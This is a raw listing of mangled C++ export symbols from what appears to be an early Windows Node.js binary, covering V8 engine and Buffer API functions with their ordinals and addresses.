                                                                                                                                                    ?AddInstancePropertyAccessor@FunctionTemplate@v8@@AEAAXV?$Handle@VString@v8@@@2@P6A?AV?$Handle@VValue@v8@@@2@V?$Local@VString@v8@@@2@AEBVAccessorInfo@2@@ZP6AX1V?$Local@VValue@v8@@@2@2@ZV42@W4AccessControl@2@W4PropertyAttribute@2@V?$Handle@VAccessorSignature@v8@@@2@@Z1380x1401617a0
                                                                                                                                                    ?AddMemoryAllocationCallback@V8@v8@@SAXP6AXW4ObjectSpace@2@W4AllocationAction@2@H@Z01@Z1390x140178d40
                                                                                                                                                    ?AddMessageListener@V8@v8@@SA_NP6AXV?$Handle@VMessage@v8@@@2@V?$Handle@VValue@v8@@@2@@Z1@Z1400x140177e90
                                                                                                                                                    ?AddObjectGroup@V8@v8@@SAXPEAV?$Persistent@VValue@v8@@@2@_KPEAVRetainedObjectInfo@2@@Z1410x140178790
                                                                                                                                                    ?AdjustAmountOfExternalAllocatedMemory@V8@v8@@SA_J_J@Z1420x140178920
                                                                                                                                                    ?AllowCodeGenerationFromStrings@Context@v8@@QEAAX_N@Z1430x140174b80
                                                                                                                                                    ?AsArray@StackTrace@v8@@QEAA?AV?$Local@VArray@v8@@@2@XZ1440x1401668b0
                                                                                                                                                    ?AsciiSlice@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z1450x140013cd0
                                                                                                                                                    ?AsciiWrite@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z1460x140014860
                                                                                                                                                    ?AtExit@node@@YAXP6AXPEAX@Z0@Z1470x140012b20
                                                                                                                                                    ?Base64Slice@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z1480x140013d50
                                                                                                                                                    ?Base64Write@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z1490x1400147c0
                                                                                                                                                    ?BinarySlice@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z1500x140013cb0
                                                                                                                                                    ?BinaryWrite@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z1510x1400147e0
                                                                                                                                                    ?BooleanValue@BooleanObject@v8@@QEBA_NXZ1520x140176910
                                                                                                                                                    ?BooleanValue@Value@v8@@QEBA_NXZ1530x140169f90
                                                                                                                                                    ?ByteLength@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z1540x140014980
                                                                                                                                                    ?Call@Debug@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VFunction@v8@@@2@V?$Handle@VValue@v8@@@2@@Z1550x14017adf0
                                                                                                                                                    ?Call@Function@v8@@QEAA?AV?$Local@VValue@v8@@@2@V?$Handle@VObject@v8@@@2@HQEAV?$Handle@VValue@v8@@@2@@Z1560x1401712c0
                                                                                                                                                    ?CallAsConstructor@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@HQEAV?$Handle@VValue@v8@@@2@@Z1570x140170a60
                                                                                                                                                    ?CallAsFunction@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@V?$Handle@VObject@v8@@@2@HQEAV?$Handle@VValue@v8@@@2@@Z1580x140170650
                                                                                                                                                    ?CanContinue@TryCatch@v8@@QEBA_NXZ1590x140164b70
                                                                                                                                                    ?CanMakeExternal@String@v8@@QEAA_NXZ1600x1401763e0
                                                                                                                                                    ?CancelDebugBreak@Debug@v8@@SAXPEAVIsolate@2@@Z1610x14017a960
                                                                                                                                                    ?CheckCast@Array@v8@@CAXPEAVValue@2@@Z1620x1401698b0
                                                                                                                                                    ?CheckCast@BooleanObject@v8@@CAXPEAVValue@2@@Z1630x140169d60
                                                                                                                                                    ?CheckCast@Date@v8@@CAXPEAVValue@2@@Z1640x1401699a0
                                                                                                                                                    ?CheckCast@External@v8@@CAXPEAVValue@2@@Z1650x1401692f0
                                                                                                                                                    ?CheckCast@Function@v8@@CAXPEAVValue@2@@Z1660x1401694d0
                                                                                                                                                    ?CheckCast@Integer@v8@@CAXPEAVValue@2@@Z1670x1401697b0
                                                                                                                                                    ?CheckCast@Number@v8@@CAXPEAVValue@2@@Z1680x1401696b0
                                                                                                                                                    ?CheckCast@NumberObject@v8@@CAXPEAVValue@2@@Z1690x140169c20
                                                                                                                                                    ?CheckCast@Object@v8@@CAXPEAVValue@2@@Z1700x1401693e0
                                                                                                                                                    ?CheckCast@RegExp@v8@@CAXPEAVValue@2@@Z1710x140169ea0
                                                                                                                                                    ?CheckCast@String@v8@@CAXPEAVValue@2@@Z1720x1401695c0
                                                                                                                                                    ?CheckCast@StringObject@v8@@CAXPEAVValue@2@@Z1730x140169ae0
                                                                                                                                                    ?CheckedGetInternalField@Object@v8@@AEAA?AV?$Local@VValue@v8@@@2@H@Z1740x140173530
                                                                                                                                                    ?Clear@?$Handle@VFunctionTemplate@v8@@@v8@@QEAAXXZ1750x140002bc0
                                                                                                                                                    ?Clear@?$Handle@VObject@v8@@@v8@@QEAAXXZ1760x140002bc0
                                                                                                                                                    ?ClearWeak@?$Persistent@VFunctionTemplate@v8@@@v8@@QEAAXXZ1770x140002cf0
                                                                                                                                                    ?ClearWeak@?$Persistent@VObject@v8@@@v8@@QEAAXXZ1780x140002cf0
                                                                                                                                                    ?ClearWeak@V8@v8@@CAXPEAPEAVObject@internal@2@@Z1790x14015f910
                                                                                                                                                    ?Clone@Object@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ1800x14016ec20
                                                                                                                                                    ?CloneElementAt@Array@v8@@QEAA?AV?$Local@VObject@v8@@@2@I@Z1810x140177800
                                                                                                                                                    ?Compile@Script@v8@@SA?AV?$Local@VScript@v8@@@2@V?$Handle@VString@v8@@@2@PEAVScriptOrigin@2@PEAVScriptData@2@0@Z1820x140163de0
                                                                                                                                                    ?Compile@Script@v8@@SA?AV?$Local@VScript@v8@@@2@V?$Handle@VString@v8@@@2@V?$Handle@VValue@v8@@@2@0@Z1830x140164020
                                                                                                                                                    ?Concat@String@v8@@SA?AV?$Local@VString@v8@@@2@V?$Handle@VString@v8@@@2@0@Z1840x140175950
                                                                                                                                                    ?ContextDisposedNotification@V8@v8@@SAHXZ1850x140173e30
                                                                                                                                                    ?Copy@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z1860x1400142e0
                                                                                                                                                    ?CreateHandle@HandleScope@v8@@SAPEAPEAVObject@internal@2@PEAV342@@Z1870x14015fe60
                                                                                                                                                    ?CreateHandle@HandleScope@v8@@SAPEAPEAVObject@internal@2@PEAVHeapObject@42@@Z1880x14015feb0
                                                                                                                                                    ?CreationContext@Object@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ1890x14016ee70
                                                                                                                                                    ?CurrentStackTrace@StackTrace@v8@@SA?AV?$Local@VStackTrace@v8@@@2@HW4StackTraceOptions@12@@Z1900x140166990
                                                                                                                                                    ?Data@AccessorInfo@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ1910x140001970
                                                                                                                                                    ?Data@Buffer@node@@SAPEADPEAV12@@Z1920x140009730
                                                                                                                                                    ?Data@Buffer@node@@SAPEADV?$Handle@VValue@v8@@@v8@@@Z1930x1400096f0
                                                                                                                                                    ?DateTimeConfigurationChangeNotification@Date@v8@@SAXXZ1940x140176e90
                                                                                                                                                    ?DebugBreak@Debug@v8@@SAXPEAVIsolate@2@@Z1950x14017a930
                                                                                                                                                    ?DebugBreakForCommand@Debug@v8@@SAXPEAVClientData@12@PEAVIsolate@2@@Z1960x14017a990
                                                                                                                                                    ?DecodeBytes@node@@YA_JV?$Handle@VValue@v8@@@v8@@W4encoding@1@@Z1970x14000c360
                                                                                                                                                    ?DecodeWrite@node@@YA_JPEAD_KV?$Handle@VValue@v8@@@v8@@W4encoding@1@@Z1980x14000c460
                                                                                                                                                    ?Decompress@StartupDataDecompressor@v8@@QEAAHXZ1990x14015f1f0
                                                                                                                                                    ?DefineWrapperClass@HeapProfiler@v8@@SAXGP6APEAVRetainedObjectInfo@2@GV?$Handle@VValue@v8@@@2@@Z@Z2000x14017d490
                                                                                                                                                    ?Delete@CpuProfile@v8@@QEAAXXZ2010x14017b9f0
                                                                                                                                                    ?Delete@HeapSnapshot@v8@@QEAAXXZ2020x14017c860
                                                                                                                                                    ?Delete@Object@v8@@QEAA_NI@Z2030x14016d920
                                                                                                                                                    ?Delete@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@@Z2040x14016d5c0
                                                                                                                                                    ?DeleteAllProfiles@CpuProfiler@v8@@SAXXZ2050x14017c120
                                                                                                                                                    ?DeleteAllSnapshots@HeapProfiler@v8@@SAXXZ2060x14017d420
                                                                                                                                                    ?DeleteHiddenValue@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@@Z2070x14016f580
                                                                                                                                                    ?DeoptimizeAll@Testing@v8@@SAXXZ2080x14017d600
                                                                                                                                                    ?DetachGlobal@Context@v8@@QEAAXXZ2090x1401749a0
                                                                                                                                                    ?DisableAgent@Debug@v8@@SAXXZ2100x14017b240
                                                                                                                                                    ?Dispose@?$Persistent@VFunctionTemplate@v8@@@v8@@QEAAXXZ2110x140002c00
                                                                                                                                                    ?Dispose@?$Persistent@VObject@v8@@@v8@@QEAAXXZ2120x140002c00
                                                                                                                                                    ?Dispose@ExternalStringResourceBase@String@v8@@MEAAXXZ2130x1400010f0
                                                                                                                                                    ?Dispose@Isolate@v8@@QEAAXXZ2140x1401792d0
                                                                                                                                                    ?Dispose@V8@v8@@SA_NXZ2150x140173a80
                                                                                                                                                    ?DisposeGlobal@V8@v8@@CAXPEAPEAVObject@internal@2@@Z2160x14015fbc0
                                                                                                                                                    ?Empty@String@v8@@SA?AV?$Local@VString@v8@@@2@XZ2170x140175790
                                                                                                                                                    ?EnableAgent@Debug@v8@@SA_NPEBDH_N@Z2180x14017b1d0
                                                                                                                                                    ?EnableSlidingStateWindow@V8@v8@@SAXXZ2190x140178620
                                                                                                                                                    ?Encode@node@@YA?AV?$Local@VValue@v8@@@v8@@PEBX_KW4encoding@1@@Z2200x14000c340
                                                                                                                                                    ?Enter@Context@v8@@QEAAXXZ2210x14015ff00
                                                                                                                                                    ?Enter@Isolate@v8@@QEAAXXZ2220x140179340
                                                                                                                                                    ?Equals@Value@v8@@QEBA_NV?$Handle@VValue@v8@@@2@@Z2230x14016ad50
                                                                                                                                                    ?ErrnoException@node@@YA?AV?$Local@VValue@v8@@@v8@@HPEBD00@Z2240x14000a350
                                                                                                                                                    ?Error@Exception@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z2250x14017a1f0
                                                                                                                                                    ?Exception@TryCatch@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ2260x140164c10
                                                                                                                                                    ?Exit@Context@v8@@QEAAXXZ2270x140160010
                                                                                                                                                    ?Exit@Isolate@v8@@QEAAXXZ2280x140179360
                                                                                                                                                    ?False@v8@@YA?AV?$Handle@VBoolean@v8@@@1@XZ2290x14015f630
                                                                                                                                                    ?FatalException@node@@YAXAEAVTryCatch@v8@@@Z2300x14000ed50
                                                                                                                                                    ?Fill@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z2310x140013d70
                                                                                                                                                    ?FindInstanceInPrototypeChain@Object@v8@@QEAA?AV?$Local@VObject@v8@@@2@V?$Handle@VFunctionTemplate@v8@@@2@@Z2320x14016c8e0
                                                                                                                                                    ?FindProfile@CpuProfiler@v8@@SAPEBVCpuProfile@2@IV?$Handle@VValue@v8@@@2@@Z2330x14017be70
                                                                                                                                                    ?FindSnapshot@HeapProfiler@v8@@SAPEBVHeapSnapshot@2@I@Z2340x14017d020
                                                                                                                                                    ?ForceDelete@Object@v8@@QEAA_NV?$Handle@VValue@v8@@@2@@Z2350x14016bc90
                                                                                                                                                    ?ForceSet@Object@v8@@QEAA_NV?$Handle@VValue@v8@@@2@0W4PropertyAttribute@2@@Z2360x14016ba10
                                                                                                                                                    ?FullIsNull@Value@v8@@AEBA_NXZ2370x140167630
                                                                                                                                                    ?FullIsString@Value@v8@@AEBA_NXZ2380x140167950
                                                                                                                                                    ?FullIsUndefined@Value@v8@@AEBA_NXZ2390x140167570
                                                                                                                                                    ?FullUnwrap@External@v8@@CAPEAXV?$Handle@VValue@v8@@@2@@Z2400x140175520
                                                                                                                                                    ?Get@Message@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ2410x140164f90
                                                                                                                                                    ?Get@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@I@Z2420x14016c110
                                                                                                                                                    ?Get@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@V?$Handle@VValue@v8@@@2@@Z2430x14016bf50
                                                                                                                                                    ?GetBottomUpRoot@CpuProfile@v8@@QEBAPEBVCpuProfileNode@2@XZ2440x14017bc20
                                                                                                                                                    ?GetCallUid@CpuProfileNode@v8@@QEBAIXZ2450x14017b880
                                                                                                                                                    ?GetCalling@Context@v8@@SA?AV?$Local@VContext@v8@@@2@XZ2460x140174820
                                                                                                                                                    ?GetChild@CpuProfileNode@v8@@QEBAPEBV12@H@Z2470x14017b970
                                                                                                                                                    ?GetChild@HeapGraphNode@v8@@QEBAPEBVHeapGraphEdge@2@H@Z2480x14017c700
                                                                                                                                                    ?GetChildrenCount@CpuProfileNode@v8@@QEBAHXZ2490x14017b900
                                                                                                                                                    ?GetChildrenCount@HeapGraphNode@v8@@QEBAHXZ2500x14017c690
                                                                                                                                                    ?GetChunkSize@OutputStream@v8@@UEAAHXZ2510x140001710
                                                                                                                                                    ?GetColumn@StackFrame@v8@@QEBAHXZ2520x140166c00
                                                                                                                                                    ?GetCompressedStartupData@V8@v8@@SAXPEAVStartupData@2@@Z2530x140368010
                                                                                                                                                    ?GetCompressedStartupDataAlgorithm@V8@v8@@SA?AW4CompressionAlgorithm@StartupData@2@XZ2540x14028a7c0
                                                                                                                                                    ?GetCompressedStartupDataCount@V8@v8@@SAHXZ2550x14028a7c0
                                                                                                                                                    ?GetConstructor@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ2560x14016d2a0
                                                                                                                                                    ?GetConstructorName@Object@v8@@QEAA?AV?$Local@VString@v8@@@2@XZ2570x14016d430
                                                                                                                                                    ?GetCurrent@Context@v8@@SA?AV?$Local@VContext@v8@@@2@XZ2580x140174740
                                                                                                                                                    ?GetCurrent@Isolate@v8@@SAPEAV12@XZ2590x140179290
                                                                                                                                                    ?GetCurrentThreadId@V8@v8@@SAHXZ2600x1401790b0
                                                                                                                                                    ?GetData@Context@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ2610x140160220
                                                                                                                                                    ?GetData@Isolate@v8@@QEAAPEAXXZ2620x140001400
                                                                                                                                                    ?GetDebugContext@Debug@v8@@SA?AV?$Local@VContext@v8@@@2@XZ2630x14017b280
                                                                                                                                                    ?GetElementCount@RetainedObjectInfo@v8@@UEAA_JXZ2640x1400132b0
                                                                                                                                                    ?GetEndColumn@Message@v8@@QEBAHXZ2650x140166000
                                                                                                                                                    ?GetEndPosition@Message@v8@@QEBAHXZ2660x140165c40
                                                                                                                                                    ?GetEntered@Context@v8@@SA?AV?$Local@VContext@v8@@@2@XZ2670x1401746c0
                                                                                                                                                    ?GetExternalAsciiStringResource@String@v8@@QEBAPEBVExternalAsciiStringResource@12@XZ2680x140172f70
                                                                                                                                                    ?GetFlags@RegExp@v8@@QEBA?AW4Flags@12@XZ2690x140177590
                                                                                                                                                    ?GetFrame@StackTrace@v8@@QEBA?AV?$Local@VStackFrame@v8@@@2@I@Z2700x140166620
                                                                                                                                                    ?GetFrameCount@StackTrace@v8@@QEBAHXZ2710x1401667d0
                                                                                                                                                    ?GetFromNode@HeapGraphEdge@v8@@QEBAPEBVHeapGraphNode@2@XZ2720x14017c370
                                                                                                                                                    ?GetFunction@FunctionTemplate@v8@@QEAA?AV?$Local@VFunction@v8@@@2@XZ2730x140175060
                                                                                                                                                    ?GetFunctionName@CpuProfileNode@v8@@QEBA?AV?$Handle@VString@v8@@@2@XZ2740x14017b3d0
                                                                                                                                                    ?GetFunctionName@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ2750x1401670d0
                                                                                                                                                    ?GetGroupLabel@RetainedObjectInfo@v8@@UEAAPEBDXZ2760x1400132a0
                                                                                                                                                    ?GetHeapStatistics@V8@v8@@SAXPEAVHeapStatistics@2@@Z2770x140173b20
                                                                                                                                                    ?GetHeapValue@HeapGraphNode@v8@@QEBA?AV?$Handle@VValue@v8@@@2@XZ2780x14017c790
                                                                                                                                                    ?GetHiddenValue@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z2790x14016f390
                                                                                                                                                    ?GetId@HeapGraphNode@v8@@QEBAIXZ2800x14017c5b0
                                                                                                                                                    ?GetIdentityHash@Object@v8@@QEAAHXZ2810x14016f000
                                                                                                                                                    ?GetIndexedPropertiesExternalArrayData@Object@v8@@QEAAPEAXXZ2820x140170110
                                                                                                                                                    ?GetIndexedPropertiesExternalArrayDataLength@Object@v8@@QEAAHXZ2830x140170370
                                                                                                                                                    ?GetIndexedPropertiesExternalArrayDataType@Object@v8@@QEAA?AW4ExternalArrayType@2@XZ2840x140170200
                                                                                                                                                    ?GetIndexedPropertiesPixelData@Object@v8@@QEAAPEAEXZ2850x14016fc20
                                                                                                                                                    ?GetIndexedPropertiesPixelDataLength@Object@v8@@QEAAHXZ2860x14016fd00
                                                                                                                                                    ?GetInferredName@Function@v8@@QEBA?AV?$Handle@VValue@v8@@@2@XZ2870x1401717d0
                                                                                                                                                    ?GetIsolate@AccessorInfo@v8@@QEBAPEAVIsolate@2@XZ2880x140001960
                                                                                                                                                    ?GetLineNumber@CpuProfileNode@v8@@QEBAHXZ2890x14017b600
                                                                                                                                                    ?GetLineNumber@Message@v8@@QEBAHXZ2900x140165860
                                                                                                                                                    ?GetLineNumber@StackFrame@v8@@QEBAHXZ2910x140166a70
                                                                                                                                                    ?GetMaxSnapshotJSObjectId@HeapSnapshot@v8@@QEBAIXZ2920x14017cce0
                                                                                                                                                    ?GetMemorySizeUsedByProfiler@HeapProfiler@v8@@SA_KXZ2930x14017d520
                                                                                                                                                    ?GetMirror@Debug@v8@@SA?AV?$Local@VValue@v8@@@2@V?$Handle@VValue@v8@@@2@@Z2940x14017afa0
                                                                                                                                                    ?GetName@Function@v8@@QEBA?AV?$Handle@VValue@v8@@@2@XZ2950x140171740
                                                                                                                                                    ?GetName@HeapGraphEdge@v8@@QEBA?AV?$Handle@VValue@v8@@@2@XZ2960x14017c200
                                                                                                                                                    ?GetName@HeapGraphNode@v8@@QEBA?AV?$Handle@VString@v8@@@2@XZ2970x14017c4e0
                                                                                                                                                    ?GetNativeFunction@Extension@v8@@UEAA?AV?$Handle@VFunctionTemplate@v8@@@2@V?$Handle@VString@v8@@@2@@Z2980x140001290
                                                                                                                                                    ?GetNode@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@H@Z2990x14017cc50
                                                                                                                                                    ?GetNodeById@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@I@Z3000x14017cb30
                                                                                                                                                    ?GetNodesCount@HeapSnapshot@v8@@QEBAHXZ3010x14017cbe0
                                                                                                                                                    ?GetOutputEncoding@OutputStream@v8@@UEAA?AW4OutputEncoding@12@XZ3020x14028a7c0
                                                                                                                                                    ?GetOwnPropertyNames@Object@v8@@QEAA?AV?$Local@VArray@v8@@@2@XZ3030x14016cd60
                                                                                                                                                    ?GetPersistentHandleCount@HeapProfiler@v8@@SAHXZ3040x14017d500
                                                                                                                                                    ?GetProfile@CpuProfiler@v8@@SAPEBVCpuProfile@2@HV?$Handle@VValue@v8@@@2@@Z3050x14017bda0
                                                                                                                                                    ?GetProfilesCount@CpuProfiler@v8@@SAHXZ3060x14017bd10
                                                                                                                                                    ?GetPropertyAttributes@Object@v8@@QEAA?AW4PropertyAttribute@2@V?$Handle@VValue@v8@@@2@@Z3070x14016c2c0
                                                                                                                                                    ?GetPropertyNames@Object@v8@@QEAA?AV?$Local@VArray@v8@@@2@XZ3080x14016caf0
                                                                                                                                                    ?GetPrototype@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ3090x14016c530
                                                                                                                                                    ?GetRealNamedProperty@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z3100x14016e740
                                                                                                                                                    ?GetRealNamedPropertyInPrototypeChain@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@V?$Handle@VString@v8@@@2@@Z3110x14016e570
                                                                                                                                                    ?GetRoot@HeapSnapshot@v8@@QEBAPEBVHeapGraphNode@2@XZ3120x14017cab0
                                                                                                                                                    ?GetScriptColumnNumber@Function@v8@@QEBAHXZ3130x140171aa0
                                                                                                                                                    ?GetScriptData@Message@v8@@QEBA?AV?$Handle@VValue@v8@@@2@XZ3140x140165320
                                                                                                                                                    ?GetScriptId@Function@v8@@QEBA?AV?$Handle@VValue@v8@@@2@XZ3150x140171be0
                                                                                                                                                    ?GetScriptLineNumber@Function@v8@@QEBAHXZ3160x1401719e0
                                                                                                                                                    ?GetScriptName@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ3170x140166d90
                                                                                                                                                    ?GetScriptNameOrSourceURL@StackFrame@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ3180x140166f30
                                                                                                                                                    ?GetScriptOrigin@Function@v8@@QEBA?AVScriptOrigin@2@XZ3190x140171860
                                                                                                                                                    ?GetScriptResourceName@CpuProfileNode@v8@@QEBA?AV?$Handle@VString@v8@@@2@XZ3200x14017b530
                                                                                                                                                    ?GetScriptResourceName@Message@v8@@QEBA?AV?$Handle@VValue@v8@@@2@XZ3210x140165140
                                                                                                                                                    ?GetSecurityToken@Context@v8@@QEAA?AV?$Handle@VValue@v8@@@2@XZ3220x140174520
                                                                                                                                                    ?GetSelfSamplesCount@CpuProfileNode@v8@@QEBANXZ3230x14017b800
                                                                                                                                                    ?GetSelfSize@HeapGraphNode@v8@@QEBAHXZ3240x14017c620
                                                                                                                                                    ?GetSelfTime@CpuProfileNode@v8@@QEBANXZ3250x14017b700
                                                                                                                                                    ?GetSizeInBytes@RetainedObjectInfo@v8@@UEAA_JXZ3260x1400132b0
                                                                                                                                                    ?GetSnapshot@HeapProfiler@v8@@SAPEBVHeapSnapshot@2@H@Z3270x14017cf90
                                                                                                                                                    ?GetSnapshotObjectId@HeapProfiler@v8@@SAIV?$Handle@VValue@v8@@@2@@Z3280x14017d0c0
                                                                                                                                                    ?GetSnapshotsCount@HeapProfiler@v8@@SAHXZ3290x14017cf10
                                                                                                                                                    ?GetSource@RegExp@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ3300x140177490
                                                                                                                                                    ?GetSourceLine@Message@v8@@QEBA?AV?$Local@VString@v8@@@2@XZ3310x1401662b0
                                                                                                                                                    ?GetStackTrace@Message@v8@@QEBA?AV?$Handle@VStackTrace@v8@@@2@XZ3320x140165500
                                                                                                                                                    ?GetStartColumn@Message@v8@@QEBAHXZ3330x140165d80
                                                                                                                                                    ?GetStartPosition@Message@v8@@QEBAHXZ3340x140165b00
                                                                                                                                                    ?GetStressRuns@Testing@v8@@SAHXZ3350x14017d560
                                                                                                                                                    ?GetTitle@CpuProfile@v8@@QEBA?AV?$Handle@VString@v8@@@2@XZ3360x14017bb50
                                                                                                                                                    ?GetTitle@HeapSnapshot@v8@@QEBA?AV?$Handle@VString@v8@@@2@XZ3370x14017c9e0
                                                                                                                                                    ?GetToNode@HeapGraphEdge@v8@@QEBAPEBVHeapGraphNode@2@XZ3380x14017c400
                                                                                                                                                    ?GetTopDownRoot@CpuProfile@v8@@QEBAPEBVCpuProfileNode@2@XZ3390x14017bca0
                                                                                                                                                    ?GetTotalSamplesCount@CpuProfileNode@v8@@QEBANXZ3400x14017b780
                                                                                                                                                    ?GetTotalTime@CpuProfileNode@v8@@QEBANXZ3410x14017b680
                                                                                                                                                    ?GetType@HeapGraphEdge@v8@@QEBA?AW4Type@12@XZ3420x14017c190
                                                                                                                                                    ?GetType@HeapGraphNode@v8@@QEBA?AW4Type@12@XZ3430x14017c470
                                                                                                                                                    ?GetType@HeapSnapshot@v8@@QEBA?AW4Type@12@XZ3440x14017c900
                                                                                                                                                    ?GetUid@CpuProfile@v8@@QEBAIXZ3450x14017bae0
                                                                                                                                                    ?GetUid@HeapSnapshot@v8@@QEBAIXZ3460x14017c970
                                                                                                                                                    ?GetVersion@V8@v8@@SAPEBDXZ3470x140173e70
                                                                                                                                                    ?GetWrapperClassId@V8@v8@@CAGPEAPEAVObject@internal@2@@Z3480x140174e80
                                                                                                                                                    ?Global@Context@v8@@QEAA?AV?$Local@VObject@v8@@@2@XZ3490x1401748c0
                                                                                                                                                    ?GlobalizeReference@V8@v8@@CAPEAPEAVObject@internal@2@PEAPEAV342@@Z3500x14015f760
                                                                                                                                                    ?Has@Object@v8@@QEAA_NI@Z3510x14016dad0
                                                                                                                                                    ?Has@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@@Z3520x14016d790
                                                                                                                                                    ?HasCaught@TryCatch@v8@@QEBA_NXZ3530x140164b40
                                                                                                                                                    ?HasIndexedLookupInterceptor@Object@v8@@QEAA_NXZ3540x14016e3b0
                                                                                                                                                    ?HasIndexedPropertiesInExternalArrayData@Object@v8@@QEAA_NXZ3550x140170020
                                                                                                                                                    ?HasIndexedPropertiesInPixelData@Object@v8@@QEAA_NXZ3560x14016fb40
                                                                                                                                                    ?HasInstance@Buffer@node@@SA_NV?$Handle@VValue@v8@@@v8@@@Z3570x140014e10
                                                                                                                                                    ?HasInstance@FunctionTemplate@v8@@QEAA_NV?$Handle@VValue@v8@@@2@@Z3580x140175230
                                                                                                                                                    ?HasNamedLookupInterceptor@Object@v8@@QEAA_NXZ3590x14016e2e0
                                                                                                                                                    ?HasOutOfMemoryException@Context@v8@@QEAA_NXZ3600x140174620
                                                                                                                                                    ?HasOwnProperty@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@@Z3610x14016de40
                                                                                                                                                    ?HasRealIndexedProperty@Object@v8@@QEAA_NI@Z3620x14016e090
                                                                                                                                                    ?HasRealNamedCallbackProperty@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@@Z3630x14016e180
                                                                                                                                                    ?HasRealNamedProperty@Object@v8@@QEAA_NV?$Handle@VString@v8@@@2@@Z3640x14016df80
                                                                                                                                                    ?HexSlice@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z3650x140013d30
                                                                                                                                                    ?HexWrite@Buffer@node@@CA?AV?$Handle@VValue@v8@@@v8@@AEBVArguments@4@@Z3660x140014840
                                                                                                                                                    ?Holder@AccessorInfo@v8@@QEBA?AV?$Local@VObject@v8@@@2@XZ3670x140001990
                                                                                                                                                    ?Id@Script@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ3680x140164600
                                                                                                                                                    ?IdleNotification@V8@v8@@SA_NH@Z3690x140173db0
                                                                                                                                                    ?IgnoreOutOfMemoryException@V8@v8@@SAXXZ3700x140177e30
                                                                                                                                                    ?InContext@Context@v8@@SA_NXZ3710x140174690
                                                                                                                                                    ?Inherit@FunctionTemplate@v8@@QEAAXV?$Handle@VFunctionTemplate@v8@@@2@@Z3720x140160bf0
                                                                                                                                                    ?Initialize@Buffer@node@@SAXV?$Handle@VObject@v8@@@v8@@@Z3730x140015160
                                                                                                                                                    ?Initialize@Data@HandleScope@v8@@QEAAXXZ3740x140001000
                                                                                                                                                    ?Initialize@V8@v8@@SA_NXZ3750x1401739b0
                                                                                                                                                    ?InstanceTemplate@FunctionTemplate@v8@@QEAA?AV?$Local@VObjectTemplate@v8@@@2@XZ3760x1401619e0
                                                                                                                                                    ?Int32Value@Value@v8@@QEBAHXZ3770x14016ab30
                                                                                                                                                    ?IntegerValue@Value@v8@@QEBA_JXZ3780x14016a340
                                                                                                                                                    ?InternalFieldCount@Object@v8@@QEAAHXZ3790x140173450
                                                                                                                                                    ?InternalFieldCount@ObjectTemplate@v8@@QEAAHXZ3800x1401634e0
                                                                                                                                                    ?IsActive@Locker@v8@@SA_NXZ3810x14015ce30
                                                                                                                                                    ?IsArray@Value@v8@@QEBA_NXZ3820x140167a00
                                                                                                                                                    ?IsBoolean@Value@v8@@QEBA_NXZ3830x140167c50
                                                                                                                                                    ?IsBooleanObject@Value@v8@@QEBA_NXZ3840x140168680
                                                                                                                                                    ?IsCallable@Object@v8@@QEAA_NXZ3850x140170470
                                                                                                                                                    ?IsCodeGenerationFromStringsAllowed@Context@v8@@QEAA_NXZ3860x140174c70
                                                                                                                                                    ?IsConstructor@StackFrame@v8@@QEBA_NXZ3870x1401673f0
                                                                                                                                                    ?IsDate@Value@v8@@QEBA_NXZ3880x140168090
                                                                                                                                                    ?IsDead@V8@v8@@SA_NXZ3890x14015f020
                                                                                                                                                    ?IsDirty@Object@v8@@QEAA_NXZ3900x14016ebe0
                                                                                                                                                    ?IsEmpty@?$Handle@VFunctionTemplate@v8@@@v8@@QEBA_NXZ3910x140002be0
                                                                                                                                                    ?IsEmpty@?$Handle@VObject@v8@@@v8@@QEBA_NXZ3920x140002be0
                                                                                                                                                    ?IsEval@StackFrame@v8@@QEBA_NXZ3930x140167270
                                                                                                                                                    ?IsExecutionTerminating@V8@v8@@SA_NPEAVIsolate@2@@Z3940x140179250
                                                                                                                                                    ?IsExternal@String@v8@@QEBA_NXZ3950x140172c60
                                                                                                                                                    ?IsExternal@Value@v8@@QEBA_NXZ3960x140167d20
                                                                                                                                                    ?IsExternalAscii@String@v8@@QEBA_NXZ3970x140172d20
